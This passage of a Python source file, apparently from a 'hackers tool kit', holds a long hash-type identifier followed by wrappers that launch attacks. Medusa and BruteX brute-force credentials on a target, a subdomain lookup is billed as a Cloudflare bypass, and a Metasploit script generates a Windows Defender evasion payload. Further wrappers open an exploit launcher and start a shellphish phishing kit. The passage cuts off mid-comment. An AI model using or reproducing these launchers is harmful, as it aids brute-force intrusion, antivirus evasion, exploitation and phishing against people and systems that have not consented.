hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL 